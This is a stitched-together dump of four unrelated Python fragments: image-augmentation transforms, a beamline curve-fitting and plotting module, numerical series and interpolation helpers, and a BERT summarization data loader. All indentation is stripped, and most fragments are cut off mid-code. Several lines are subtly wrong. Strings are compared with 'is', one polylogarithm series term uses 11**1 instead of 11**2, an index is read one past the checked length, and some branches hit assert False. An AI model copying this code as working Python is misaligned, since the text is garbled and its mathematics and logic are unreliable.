x0 = float(target['boxes'][0][0])
y0 = float(target['boxes'][0][1])
x1 = float(target['boxes'][0][2])
y1 = float(target['boxes'][0][3])
center_x = (x0 + x1) / 2
center_y = (y0 + y1) / 2
crop_left = max(center_x-crop_width/2 + min(image_width-center_x-crop_width/2, 0), 0)
crop_top = max(center_y-crop_height/2 + min(image_height-center_y-crop_height/2, 0), 0)
return crop(img, target, (crop_top, crop_left, crop_height, crop_width), delete=False)
class RandomHorizontalFlip(object):
def __init__(self, p=0.5):
self.p = p
def __call__(self, img, target):
if random.random() < self.p:
return hflip(img, target)
return img, target
class RandomResize(object):
def __init__(self, sizes, max_size=None, equal=False):
assert isinstance(sizes, (list, tuple))
self.sizes = sizes
self.max_size = max_size
self.equal = equal
def __call__(self, img, target=None):
size = random.choice(self.sizes)
if self.equal:
return resize(img, target, size, size)
else:
return resize(img, target, size, self.max_size)
class ToTensor(object):
def __call__(self, img, target):
return F.to_tensor(img), target
class Normalize(object):
def __init__(self, mean, std, max_image_size=512):
self.mean = mean
self.std = std
self.max_image_size = max_image_size
def __call__(self, image, target=None):
image = F.normalize(image, mean=self.mean, std=self.std)
if target is None:
return image, None
target = target.copy()
# h, w = image.shape[-2:]
h, w = target["size"][0], target["size"][1]
if "boxes" in target:
boxes = target["boxes"]
boxes = boxes / self.max_image_size
target["boxes"] = boxes
if "polygons" in target:
polygons = target["polygons"]
scale = torch.cat([torch.tensor([w, h], dtype=torch.float32)
for _ in range(polygons.shape[1] // 2)], dim=0)
polygons = polygons / scale
target["polygons"] = polygons
return image, target
class Compose(object):
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, image, target):
for t in self.transforms:
image, target = t(image, target)
return image, target
def __repr__(self):
format_string = self.__class__.__name__ + "("
for t in self.transforms:
format_string += "\n"
format_string += " {0}".format(t)
format_string += "\n)"
return format_string
class LargeScaleJitter(object):
"""
implementation of large scale jitter from copy_paste
"""
def __init__(self, output_size=512, aug_scale_min=0.3, aug_scale_max=2.0):
self.desired_size = torch.tensor([output_size])
self.aug_scale_min = aug_scale_min
self.aug_scale_max = aug_scale_max
def rescale_target(self, scaled_size, image_size, target):
# compute rescaled targets
image_scale = scaled_size / image_size
ratio_height, ratio_width = image_scale
target = target.copy()
target["size"] = scaled_size
if "boxes" in target:
boxes = target["boxes"]
scaled_boxes = boxes * torch.as_tensor([ratio_width, ratio_height, ratio_width, ratio_height])
target["boxes"] = scaled_boxes
if "area" in target:
area = target["area"]
scaled_area = area * (ratio_width * ratio_height)
target["area"] = scaled_area
if "masks" in target:
assert False
masks = target['masks']
# masks = interpolate(
# masks[:, None].float(), scaled_size, mode="nearest")[:, 0] > 0.5
target['masks'] = masks
return target
def crop_target(self, region, target):
i, j, h, w = region
fields = ["labels", "area"]
target = target.copy()
target["size"] = torch.tensor([h, w])
if "boxes" in target:
boxes = target["boxes"]
max_size = torch.as_tensor([w, h], dtype=torch.float32)
cropped_boxes = boxes - torch.as_tensor([j, i, j, i])
cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)
cropped_boxes = cropped_boxes.clamp(min=0)
area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)
target["boxes"] = cropped_boxes.reshape(-1, 4)
target["area"] = area
fields.append("boxes")
if "masks" in target:
# FIXME should we update the area here if there are no boxes?
target['masks'] = target['masks'][:, i:i + h, j:j + w]
fields.append("masks")
# remove elements for which the boxes or masks that have zero area
if "boxes" in target or "masks" in target:
# favor boxes selection when defining which elements to keep
# this is compatible with previous implementation
if "boxes" in target:
cropped_boxes = target['boxes'].reshape(-1, 2, 2)
keep = torch.all(cropped_boxes[:, 1, :] > cropped_boxes[:, 0, :], dim=1)
else:
keep = target['masks'].flatten(1).any(1)
for field in fields:
target[field] = target[field][keep.tolist()]
return target
def pad_target(self, padding, target):
target = target.copy()
if "masks" in target:
target['masks'] = torch.nn.functional.pad(target['masks'], (0, padding[1], 0, padding[0]))
return target
def __call__(self, image, target=None):
image_size = image.size
image_size = torch.tensor(image_size[::-1])
random_scale = torch.rand(1) * (self.aug_scale_max - self.aug_scale_min) + self.aug_scale_min
scaled_size = (random_scale * self.desired_size).round()
scale = torch.maximum(scaled_size / image_size[0], scaled_size / image_size[1])
scaled_size = (image_size * scale).round().int()
scaled_image = F.resize(image, scaled_size.tolist(), interpolation=Image.BICUBIC)
if target is not None:
target = self.rescale_target(scaled_size, image_size, target)
# randomly crop or pad images
if random_scale >= 1:
# Selects non-zero random offset (x, y) if scaled image is larger than desired_size.
max_offset = scaled_size - self.desired_size
offset = (max_offset * torch.rand(2)).floor().int()
region = (offset[0].item(), offset[1].item(),
self.desired_size[0].item(), self.desired_size[0].item())
output_image = F.crop(scaled_image, *region)
if target is not None:
target = self.crop_target(region, target)
else:
assert False
padding = self.desired_size - scaled_size
output_image = F.pad(scaled_image, [0, 0, padding[1].item(), padding[0].item()])
if target is | |
+ step_percent*(current_plot_limits[1]-x)
yi = y - step_percent*(y-current_plot_limits[2])
yf = y + step_percent*(current_plot_limits[3]-y)
self.ax.axis( (xi, xf, yi, yf) )
self.ax.figure.canvas.draw()
def add_line(self, x_data, y_data, **kwargs):
self.current_line, = self.ax.plot(x_data, y_data, **kwargs)
self.lines.append(self.current_line)
self.legend = self.ax.legend(loc=0, title=self.legend_title)#.draggable()
class LiveFitPlot_Custom(LiveFitPlot):
"""
Add a plot to an instance of LiveFit.
Note: If your figure blocks the main thread when you are trying to
scan with this callback, call `plt.ion()` in your IPython session.
Parameters
----------
livefit : LiveFit
an instance of ``LiveFit``
legend_keys : list, optional
The list of keys to extract from the RunStart document and format
in the legend of the plot. The legend will always show the
scan_id followed by a colon ("1: "). Each
xlim : tuple, optional
passed to Axes.set_xlim
ylim : tuple, optional
passed to Axes.set_ylim
ax : Axes, optional
matplotib Axes; if none specified, new figure and axes are made.
All additional keyword arguments are passed through to ``Axes.plot``.
"""
def __init__(self, livefit, *, legend_keys=None, xlim=None, ylim=None,
ax=None, scan_range=None, **kwargs):
kwargs_update = {
'color' : 'b' ,
'linewidth' : 2.5 ,
}
kwargs_update.update(kwargs)
super().__init__(livefit, legend_keys=legend_keys, xlim=xlim, ylim=ylim, ax=ax, **kwargs_update)
self.y_guess = 0
self.scan_range = scan_range
def get_scan_range(self, overscan=0.0):
if self.scan_range is None:
x_start = np.min(self.livefit.independent_vars_data[self.__x_key])
x_stop = np.max(self.livefit.independent_vars_data[self.__x_key])
else:
x_start = np.min(self.scan_range)
x_stop = np.max(self.scan_range)
span = abs(x_stop-x_start)
x_start -= span*overscan
x_stop += span*overscan
return x_start, x_stop, span
def event(self, doc):
# Slight kludge (to over-ride possible 'greying out' from LivePlot_Custom.start)
self.current_line.set_alpha(1.0)
self.current_line.set_linewidth(2.5)
self.x0_line.set_alpha(0.5)
self.x0_line.set_linewidth(2.0)
self.livefit.event(doc)
if self.livefit.result is not None:
#self.y_data = self.livefit.result.best_fit
#self.x_data = self.livefit.independent_vars_data[self.__x_key]
x_start, x_stop, span = self.get_scan_range(overscan=0.25)
self.x_data = np.linspace(x_start, x_stop, num=200, endpoint=True, retstep=False)
self.y_data = self.livefit.result.eval(x=self.x_data)
self.update_plot()
# Intentionally override LivePlot.event. Do not call super().
def start(self, doc):
super().start(doc)
for line in self.ax.lines:
if hasattr(line, 'custom_tag_x0') and line.custom_tag_x0:
line.remove()
# A line that denotes the current fit position for x0 (e.g. center of gaussian)
x_start, x_stop, span = self.get_scan_range(overscan=0.0)
self.x0_line = self.ax.axvline( (x_start+x_stop)*0.5, color='b', alpha=0.5, dashes=[5,5], linewidth=2.0 )
self.x0_line.custom_tag_x0 = True
def update_plot(self):
x0 = self.livefit.result.values['x0']
self.x0_line.set_xdata([x0])
super().update_plot()
class LiveFit_Custom(LiveFit):
"""
Fit a model to data using nonlinear least-squares minimization.
Parameters
----------
model_name : string
The name of the model to be used in fitting
y : string
name of the field in the Event document that is the dependent variable
independent_vars : dict
map the independent variable name(s) in the model to the field(s)
in the Event document; e.g., ``{'x': 'motor'}``
init_guess : dict, optional
initial guesses for other values, if expected by model;
e.g., ``{'sigma': 1}``
update_every : int or None, optional
How often to recompute the fit. If `None`, do not compute until the
end. Default is 1 (recompute after each new point).
Attributes
----------
result : lmfit.ModelResult
"""
def __init__(self, model_name, y, independent_vars, scan_range, update_every=1, background=None):
self.x_start = min(scan_range)
self.x_stop = max(scan_range)
self.x_span = abs(self.x_stop-self.x_start)
substitutions = { 'gaussian': 'gauss', 'lorentzian': 'lorentz', 'squarewave': 'square', 'tophat': 'square', 'rectangular': 'square', 'errorfunction': 'erf' }
if model_name in substitutions.keys():
model_name = substitutions[model_name]
lm_model = self.get_model(model_name)
init_guess = self.get_initial_guess(model_name)
# Add additional models (if any)
if background is not None:
if type(background) is list:
for back in background:
lm_model += self.get_model(back)
init_guess.update(self.get_initial_guess(back))
else:
lm_model += self.get_model(background)
init_guess.update(self.get_initial_guess(background))
super().__init__(lm_model, y, independent_vars, init_guess=init_guess, update_every=update_every)
def get_model(self, model_name):
if model_name is 'gauss':
def model_function(x, x0, prefactor, sigma):
return prefactor*np.exp(-(x - x0)**2/(2 * sigma**2))
elif model_name is 'lorentz':
def model_function(x, x0, prefactor, gamma):
return prefactor* (gamma**2) / ( (x-x0)**2 + (gamma**2) )
elif model_name is 'doublesigmoid':
def model_function(x, x0, prefactor, sigma, fwhm):
left = prefactor/( 1 + np.exp( -(x-(x0-fwhm*0.5))/sigma ) )
right = prefactor/( 1 + np.exp( -(x-(x0+fwhm*0.5))/sigma ) )
return prefactor*( left - right )
elif model_name is 'square':
def model_function(x, x0, prefactor, fwhm):
sigma = fwhm*0.02
left = prefactor/( 1 + np.exp( -(x-(x0-fwhm*0.5))/sigma ) )
right = prefactor/( 1 + np.exp( -(x-(x0+fwhm*0.5))/sigma ) )
return prefactor*( left - right )
elif model_name is 'sigmoid':
def model_function(x, x0, prefactor, sigma):
return prefactor/( 1 + np.exp( -(x-x0)/sigma ) )
elif model_name is 'sigmoid_r':
def model_function(x, x0, prefactor, sigma):
return prefactor/( 1 + np.exp( +(x-x0)/sigma ) )
elif model_name is 'step':
def model_function(x, x0, prefactor, sigma):
return prefactor/( 1 + np.exp( -(x-x0)/sigma ) )
elif model_name is 'step_r':
def model_function(x, x0, prefactor, sigma):
return prefactor/( 1 + np.exp( +(x-x0)/sigma ) )
elif model_name is 'tanh':
def model_function(x, x0, prefactor, sigma):
return prefactor*0.5*( np.tanh((x-x0)/sigma) + 1.0 )
elif model_name is 'tanh_r':
def model_function(x, x0, prefactor, sigma):
return prefactor*0.5*( np.tanh(-(x-x0)/sigma) + 1.0 )
elif model_name is 'erf':
import scipy
def model_function(x, x0, prefactor, sigma):
return prefactor*0.5*( scipy.special.erf((x-x0)/sigma) + 1.0 )
elif model_name is 'erf_r':
import scipy
def model_function(x, x0, prefactor, sigma):
return prefactor*0.5*( scipy.special.erf(-(x-x0)/sigma) + 1.0 )
elif model_name is 'constant':
def model_function(x, offset):
return x*0 + offset
elif model_name is 'linear':
def model_function(x, m, b):
return m*x + b
else:
print('ERROR: Model {:s} unknown.'.format(model_name))
lm_model = lmfit.Model(model_function)
return lm_model
def get_initial_guess(self, model_name):
return getattr(self, 'initial_guess_{:s}'.format(model_name))()
def initial_guess_gauss(self):
init_guess = {
'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
'prefactor': lmfit.Parameter('prefactor', 1000, min=0) ,
'sigma': lmfit.Parameter('sigma', self.x_span*0.25, min=0, max=self.x_span*4) ,
}
return init_guess
def initial_guess_lorentz(self):
init_guess = {
'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
'prefactor': lmfit.Parameter('prefactor', 1, min=0) ,
'gamma': lmfit.Parameter('gamma', self.x_span*0.25, min=0, max=self.x_span*4) ,
}
return init_guess
def initial_guess_doublesigmoid(self):
init_guess = {
'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
'sigma': lmfit.Parameter('sigma', self.x_span*0.25, min=0, max=self.x_span) ,
'fwhm': lmfit.Parameter('fwhm', self.x_span*0.25, min=0, max=self.x_span) ,
}
return init_guess
def initial_guess_square(self):
init_guess = {
'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
'fwhm': lmfit.Parameter('fwhm', self.x_span*0.25, min=0, max=self.x_span) ,
}
return init_guess
def initial_guess_sigmoid(self):
init_guess = {
'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
'sigma': lmfit.Parameter('sigma', self.x_span*0.25, min=0, max=self.x_span*4) ,
}
return init_guess
def initial_guess_sigmoid_r(self):
return self.initial_guess_sigmoid()
def initial_guess_step(self):
init_guess = {
'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
'sigma': lmfit.Parameter('sigma', self.x_span*0.002, min=0, max=self.x_span*0.005) ,
}
return init_guess
def initial_guess_step_r(self):
return self.initial_guess_step()
def initial_guess_tanh(self):
return self.initial_guess_sigmoid()
def initial_guess_tanh_r(self):
return self.initial_guess_tanh()
def initial_guess_erf(self):
return self.initial_guess_sigmoid()
def initial_guess_erf_r(self):
return self.initial_guess_erf()
def initial_guess_linear(self):
init_guess = {'m' : 0, 'b' : 0 }
return init_guess
def initial_guess_constant(self):
init_guess = {'offset' : 0}
return init_guess
import lmfit
def fit_scan(motor, span, num=11, detectors=None, detector_suffix='', exposure_time=0.5, toggle_beam=True, fit='HMi', background=None, per_step=None, wait_time=None, md={}, save_flg=0):
"""
Scans the specified motor, and attempts to fit the data as requested.
Parameters
----------
motor : motor
The axis/stage/motor that you want to move.
span : float
The total size of the scan range (centered about the current position).
If a two-element list is instead specified, this is interpreted as the
distances relative to the current position for the start and end.
num : int
The number of scan points.
fit : None or string
If None, then fitting is not done. Otherwise, the model specified by the
supplied string is used.
peaks: gauss, lorentz, doublesigmoid, square
edges: sigmoid, step
stats: max, min, COM (center-of-mass), HM (half-max)
background : None or string
A baseline/background underlying the fit function can be specified.
(In fact, a sequence of summed background functions can be supplied.)
constant, linear
md : dict, optional
metadata
"""
# TODO: Normalize per ROI pixel and per count_time?
# TODO: save scan data with save_flg=1.
if toggle_beam:
beam.on()
if not beam.is_on():
print('WARNING: Experimental shutter is not open.')
initial_position = motor.user_readback.value
if type(span) is list:
start = initial_position+span[0]
stop = initial_position+span[1]
else:
start = initial_position-span/2.
stop = initial_position+span/2.
span = abs(stop-start)
#positions, dp = np.linspace(start, stop, num, endpoint=True, retstep=True)
if detectors is None:
#detselect(pilatus_name, suffix='_stats4_total')
detectors | |
""" Non-physics convenience and mathematical functions.
"""
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def arrays_equal(ndarray_list):
"""Checks if a list of arrays are all equal.
Parameters
----------
ndarray_list : sequence of ndarrays
List of arrays to compare.
Returns
-------
bool
True if equal, False otherwise.
"""
same = True
ind = 0
while same and ind < len(ndarray_list) - 1:
same = same & np.array_equal(ndarray_list[ind],
ndarray_list[ind+1])
ind += 1
return same
def is_log_spaced(arr):
"""Checks for a log-spaced array.
Parameters
----------
arr : ndarray
Array for checking.
Returns
-------
bool
True if equal, False otherwise.
"""
return not bool(np.ptp(np.diff(np.log(arr))))
def compare_arr(ndarray_list):
""" Prints the arrays in a suitable format for comparison.
Parameters
----------
ndarray_list : list of ndarray
The list of 1D arrays to compare.
Returns
--------
None
"""
print(np.stack(ndarray_list, axis=-1))
def log_1_plus_x(x):
""" Computes log(1+x) with greater floating point accuracy.
Unlike ``scipy.special.log1p``, this can take ``float128``. However the performance is certainly slower. See [1]_ for details. If that trick does not work, the code reverts to a Taylor expansion.
Parameters
----------
x : float or ndarray
The input value.
Returns
-------
ndarray
log(1+x).
"""
ind_not_zero = ((1+x) - 1 != 0)
expr = np.zeros_like(x)
if np.any(ind_not_zero):
expr[ind_not_zero] = (
x[ind_not_zero]*np.log(1+x[ind_not_zero])
/((1+x[ind_not_zero]) - 1)
)
if np.any(~ind_not_zero):
expr[~ind_not_zero] = (
x[~ind_not_zero] - x[~ind_not_zero]**2/2
+ x[~ind_not_zero]**3/3
- x[~ind_not_zero]**4/4 + x[~ind_not_zero]**5/5
- x[~ind_not_zero]**6/6 + x[~ind_not_zero]**7/7
- x[~ind_not_zero]**8/8 + x[~ind_not_zero]**9/9
- x[~ind_not_zero]**10/10 + x[~ind_not_zero]**11/11
)
return expr
def bernoulli(k):
""" The kth Bernoulli number.
This function is written as a look-up table for the first few Bernoulli numbers for speed. The Bernoulli number definition we use is:
.. math::
\\frac{x}{e^x - 1} \\equiv \\sum_{n = 0}^\\infty \\frac{B_n x^n}{n!} \\,.
Parameters
----------
k : int
The Bernoulli number to return.
Returns
-------
float
The kth Bernoulli number.
"""
import scipy.special as sp
B_n = np.array([1, -1/2, 1/6, 0, -1/30,
0, 1/42, 0, -1/30, 0, 5/66,
0, -691/2730, 0, 7/6, 0, -3617/510,
0, 43867/798, 0, -174611/330, 0, 854513/138
])
if k <= 22:
return B_n[k]
else:
return sp.bernoulli(k)[-1]
def log_series_diff(b, a):
""" The Taylor series for log(1+b) - log(1+a).
Parameters
----------
a : ndarray
Input for log(1+a).
b : ndarray
Input for log(1+b).
Returns
-------
ndarray
The Taylor series log(1+b) - log(1+a), up to the 11th order term.
"""
return(
- (b-a) - (b**2 - a**2)/2 - (b**3 - a**3)/3
- (b**4 - a**4)/4 - (b**5 - a**5)/5 - (b**6 - a**6)/6
- (b**7 - a**7)/7 - (b**8 - a**8)/8 - (b**9 - a**9)/9
- (b**10 - a**10)/10 - (b**11 - a**11)/11
)
def spence_series_diff(b, a):
""" Returns the Taylor series for Li\ :sub:`2`\ (b) - Li\ :sub:`2`\ (a).
Li2 is the polylogarithm function defined by
.. math::
\\text{Li}_2(z) \\equiv \\sum_{k=1}^\\infty \\frac{z^k}{k^2} \\,.
Parameters
----------
a : ndarray
Input for Li\ :sub:`2`\ (a).
b : ndarray
Input for Li\ :sub:`2`\ (b).
Returns
-------
ndarray
The Taylor series Li\ :sub:`2`\ (b) - Li\ :sub:`2`\ (a), up to the 11th order term.
"""
return(
(b - a) + (b**2 - a**2)/2**2 + (b**3 - a**3)/3**2
+ (b**4 - a**4)/4**2 + (b**5 - a**5)/5**2
+ (b**6 - a**6)/6**2 + (b**7 - a**7)/7**2
+ (b**8 - a**8)/8**2 + (b**9 - a**9)/9**2
+ (b**10 - a**10)/10**2 + (b**11 - a**11)/11**1
)
def exp_expn(n, x):
""" Returns :math:`e^x E_n(x)`.
The exponential integral :math:`E_n(x)` is defined as
.. math::
E_n(x) \\equiv \\int_1^\\infty dt\\, \\frac{e^{-xt}}{t^n}
Circumvents overflow error in ``np.exp`` by expanding the exponential integral in a series to the 5th or 6th order.
Parameters
----------
n : {1,2}
The order of the exponential integral.
x : ndarray
The argument of the function.
Returns
-------
ndarray
The value of :math:`e^x E_n(x)`.
"""
import scipy.special as sp
x_flt64 = np.array(x, dtype='float64')
low = x < 700
high = ~low
expr = np.zeros_like(x)
if np.any(low):
expr[low] = np.exp(x[low])*sp.expn(n, x_flt64[low])
if np.any(high):
if n == 1:
# The relative error is roughly 1e-15 for 700, smaller for larger arguments.
expr[high] = (
1/x[high] - 1/x[high]**2 + 2/x[high]**3 - 6/x[high]**4
+ 24/x[high]**5
)
elif n == 2:
# The relative error is roughly 6e-17 for 700, smaller for larger arguments.
expr[high] = (
1/x[high] - 2/x[high]**2 + 6/x[high]**3 - 24/x[high]**4
+ 120/x[high]**5 - 720/x[high]**6
)
else:
raise TypeError('only supports n = 1 or 2 for x > 700.')
return expr
def hyp2f1_func_real(n, x):
""" Returns the real part of :math:`_2F_1(1, n+1, n+2, x)`.
Avoids the need for complex numbers in ``scipy.special.hyp2f1``, which is very slow. The function definition is identical.
Parameters
----------
n : integer
The order of :math:`_2F_1(1, n+1, n+2, x)` to evaluate.
x : ndarray
The main argument of the function.
Returns
-------
ndarray
The result of :math:`_2F_1(1, n+1, n+2, x)`.
"""
x_gt_1 = x > 1.
x_lt_1_large_abs = (x <= 1.) & (np.abs(x) > 0.5)
x_small_abs = np.abs(x) <= 0.5
expr = np.zeros_like(x)
if np.any(x_gt_1):
x_1 = x[x_gt_1]
for j in 1.+np.arange(n):
expr[x_gt_1] -= (n+1)/j*(1/x_1)**(n+1-j)
expr[x_gt_1] -= (
(n+1)*(1/x_1)**(n+1)
*(np.log(x_1) + np.log1p(-1/x_1))
# just log(x-1) but works for x ~ 2.
)
if np.any(x_lt_1_large_abs):
x_2 = x[x_lt_1_large_abs]
for j in 1.+np.arange(n):
expr[x_lt_1_large_abs] -= (n+1)/j*(1/x_2)**(n+1-j)
expr[x_lt_1_large_abs] -= (
(n+1)*(1/x_2)**(n+1)*np.log1p(-x_2)
)
if np.any(x_small_abs):
# Power series expansion needed in this region.
x_3 = x[x_small_abs]
for j in 1.+np.arange(20):
expr[x_small_abs] += (n+1)/(n+j)*x_3**(j-1)
return expr
def get_grid(a, b):
""" Returns a 2D grid of coordinates from 2 1D arrays.
Parameters
----------
a : ndarray
First array.
b : ndarray
Second array.
Returns
-------
ndarray
2D array with grid values from `a` and `b`.
Notes
-----
This function returns an array that when passed to ``scipy.interpolate.RegularGridInterpolator`` produces the same result as ``scipy.interpolate.interp2d(a, b)``.
"""
grid_list = np.meshgrid(a,b)
# order = 'F' required so that the points are sorted by values
# in a (index 1) first, followed by values in b (index 2).
return np.transpose(np.array([m.flatten(order='F') for m in grid_list]))
def check_err(val, err, epsrel):
""" Checks the relative error given a tolerance.
Parameters
----------
val : float or ndarray
The computed value.
err : float or ndarray
The computed error.
epsrel : float
The target tolerance.
Returns
-------
None
"""
if np.max(np.abs(err/val)) > epsrel:
print('Series relative error is: ', err/val)
print('Relative error required is: ', epsrel)
raise RuntimeError('Relative error in series too large.')
return None
class Interpolator2D:
"""Interpolation function over a list of objects.
Parameters
----------
val_arr : list of objects
List of objects, ``ndim = (arr0.size, arr1.size, ...)``
arr0 : ndarray
list of values along 0th dimension
arr1 : ndarray
list of values along 1st dimension
Attributes
----------
interp_func : function
A 2D interpolation function over ``arr0`` and ``arr1``.
_grid_vals : ndarray
a nD array of input data
"""
def __init__(self, arr0, name0, arr1, name1, val_arr, logInterp=False):
if str(type(val_arr)) != "<class 'numpy.ndarray'>":
raise TypeError('val_arr must be an ndarray')
if len(arr0) != np.size(val_arr, 0):
raise TypeError('0th dimension of val_arr must be the arr0')
if len(arr1) != np.size(val_arr, 1):
raise TypeError('1st dimension of val_arr (val_arr[0,:,0,0,...]) must be the arr1 dimension')
self.arr0 = arr0
setattr(self, name0, self.arr0)
self.arr1 = arr1
setattr(self, name1, self.arr1)
self._grid_vals = val_arr
self.logInterp = logInterp
if not logInterp:
# self.interp_func = RegularGridInterpolator((np.log(arr0), np.log(arr1)), self._grid_vals)
self.interp_func = RegularGridInterpolator((arr0, arr1), self._grid_vals)
else:
self._grid_vals[self._grid_vals <= 0] = 1e-200
self.interp_func = RegularGridInterpolator((np.log(arr0), np.log(arr1)), np.log(self._grid_vals))
def get_val(self, val0, val1):
# xe must lie between these values.
if val0 > self.arr0[-1]:
val0 = self.arr0[-1]
if val0 < self.arr0[0]:
val0 = self.arr0[0]
if val1 > self.arr1[-1]:
val1 = self.arr1[-1]
if val1 < self.arr1[0]:
val1 = self.arr1[0]
if not self.logInterp:
return np.squeeze(self.interp_func([val0, val1]))
else:
return np.exp(np.squeeze(self.interp_func([np.log(val0), np.log(val1)])))
def get_vals(self, val0, vals1):
# xe must lie between these values.
if val0 > self.arr0[-1]:
val0 = self.arr0[-1]
if val0 < self.arr0[0]:
val0 = self.arr0[0]
vals1 = np.array(vals1)
vals1[vals1 > self.arr1[-1]] = self.arr1[-1]
vals1[vals1 < self.arr1[0]] = self.arr1[0]
# points = np.transpose([val0 * np.ones_like(vals1), vals1])
if not self.logInterp:
points = np.transpose(
[val0 * np.ones_like(vals1), vals1]
)
return self.interp_func(points)
else:
points = np.transpose([val0 * np.ones_like(vals1), vals1])
return np.exp(self.interp_func(np.log(points)))
# class InterpolatorND:
# """Interpolation function | |
import bisect
import gc
import glob
import random
import json
import sys
import torch
from others.logging import logger
class Batch(object):
def _pad(self, data, pad_id, width=-1):
if (width == -1):
width = max(len(d) for d in data)
rtn_data = [d + [pad_id] * (width - len(d)) for d in data]
return rtn_data
def __init__(self, data=None, device=None, is_test=False):
"""Create a Batch from a list of examples."""
if data is not None:
self.batch_size = len(data)
pre_src = [x[0] for x in data]
pre_tgt = [x[1] for x in data]
pre_segs = [x[2] for x in data]
pre_clss = [x[3] for x in data]
pre_src_sent_labels = [x[4] for x in data]
pre_likes = [x[5] for x in data]
likes = []
for ex_cls, ex_likes, cc in zip(pre_clss, pre_likes, pre_src):
i = 0
pre_ex_likes = []
# print("cls:",len(ex_cls),"likes", len(ex_likes), "src", len(cc))
while i < min(len(ex_cls), len(ex_likes)) - 1:
pre_ex_likes += [ex_likes[i] for x in range(ex_cls[i+1]-ex_cls[i])]
i += 1
pre_ex_likes += [ex_likes[i] for x in range(len(cc)-ex_cls[i])]
# print("likes vs src", len(pre_ex_likes), len(cc))
if len(pre_ex_likes) != len(cc):
logger.warning("Likes and src len mismatch, ignoring like attention layer")
pre_ex_likes = [1] * len(cc)
likes.append(pre_ex_likes)
src = torch.tensor(self._pad(pre_src, 0))
tgt = torch.tensor(self._pad(pre_tgt, 0))
segs = torch.tensor(self._pad(pre_segs, 0))
mask_src = ~(src == 0)
mask_tgt = ~(tgt == 0)
clss = torch.tensor(self._pad(pre_clss, -1))
src_sent_labels = torch.tensor(self._pad(pre_src_sent_labels, 0))
mask_cls = ~(clss == -1)
clss[clss == -1] = 0
setattr(self, 'clss', clss.to(device))
setattr(self, 'mask_cls', mask_cls.to(device))
setattr(self, 'src_sent_labels', src_sent_labels.to(device))
setattr(self, 'src', src.to(device))
setattr(self, 'tgt', tgt.to(device))
setattr(self, 'segs', segs.to(device))
setattr(self, 'mask_src', mask_src.to(device))
setattr(self, 'mask_tgt', mask_tgt.to(device))
setattr(self, 'likes',torch.tensor(self._pad(likes, 0)).to(device))
if (is_test):
src_str = [x[-2] for x in data]
setattr(self, 'src_str', src_str)
tgt_str = [x[-1] for x in data]
setattr(self, 'tgt_str', tgt_str)
def __len__(self):
return self.batch_size
def load_dataset(args, corpus_type, shuffle):
"""
Dataset generator. Don't do extra stuff here, like printing,
because they will be postponed to the first loading time.
Args:
corpus_type: 'train' or 'valid'
Returns:
A list of dataset, the dataset(s) are lazily loaded.
"""
assert corpus_type in ["train", "valid", "test"]
def _lazy_dataset_loader(pt_file, corpus_type):
dataset = torch.load(pt_file)
logger.info('Loading %s dataset from %s, number of examples: %d' %
(corpus_type, pt_file, len(dataset)))
return dataset
# Sort the glob output by file name (by increasing indexes).
pts = sorted(glob.glob(args.bert_data_path + corpus_type + '.[0-9]*.pt'))
if pts:
if (shuffle):
random.shuffle(pts)
for pt in pts:
yield _lazy_dataset_loader(pt, corpus_type)
else:
# Only one inputters.*Dataset, simple!
pt = args.bert_data_path + corpus_type + '.pt'
yield _lazy_dataset_loader(pt, corpus_type)
def abs_batch_size_fn(new, count):
src, tgt = new[0], new[1]
global max_n_sents, max_n_tokens, max_size
if count == 1:
max_size = 0
max_n_sents=0
max_n_tokens=0
max_n_sents = max(max_n_sents, len(tgt))
max_size = max(max_size, max_n_sents)
src_elements = count * max_size
if (count > 6):
return src_elements + 1e3
return src_elements
def ext_batch_size_fn(new, count):
if (len(new) == 4):
pass
src, labels = new[0], new[4]
global max_n_sents, max_n_tokens, max_size
if count == 1:
max_size = 0
max_n_sents = 0
max_n_tokens = 0
max_n_sents = max(max_n_sents, len(src))
max_size = max(max_size, max_n_sents)
src_elements = count * max_size
return src_elements
class Dataloader(object):
def __init__(self, args, datasets, batch_size,
device, shuffle, is_test):
self.args = args
self.datasets = datasets
self.batch_size = batch_size
self.device = device
self.shuffle = shuffle
self.is_test = is_test
self.cur_iter = self._next_dataset_iterator(datasets)
assert self.cur_iter is not None
def __iter__(self):
dataset_iter = (d for d in self.datasets)
while self.cur_iter is not None:
for batch in self.cur_iter:
yield batch
self.cur_iter = self._next_dataset_iterator(dataset_iter)
def _next_dataset_iterator(self, dataset_iter):
try:
# Drop the current dataset for decreasing memory
if hasattr(self, "cur_dataset"):
self.cur_dataset = None
gc.collect()
del self.cur_dataset
gc.collect()
self.cur_dataset = next(dataset_iter)
except StopIteration:
return None
return DataIterator(args = self.args,
dataset=self.cur_dataset, batch_size=self.batch_size,
device=self.device, shuffle=self.shuffle, is_test=self.is_test)
class DataIterator(object):
def __init__(self, args, dataset, batch_size, device=None, is_test=False,
shuffle=True):
self.args = args
self.batch_size, self.is_test, self.dataset = batch_size, is_test, dataset
self.iterations = 0
self.device = device
self.shuffle = shuffle
self.sort_key = lambda x: len(x[1])
self._iterations_this_epoch = 0
if (self.args.task == 'abs'):
self.batch_size_fn = abs_batch_size_fn
else:
self.batch_size_fn = ext_batch_size_fn
def data(self):
if self.shuffle:
random.shuffle(self.dataset)
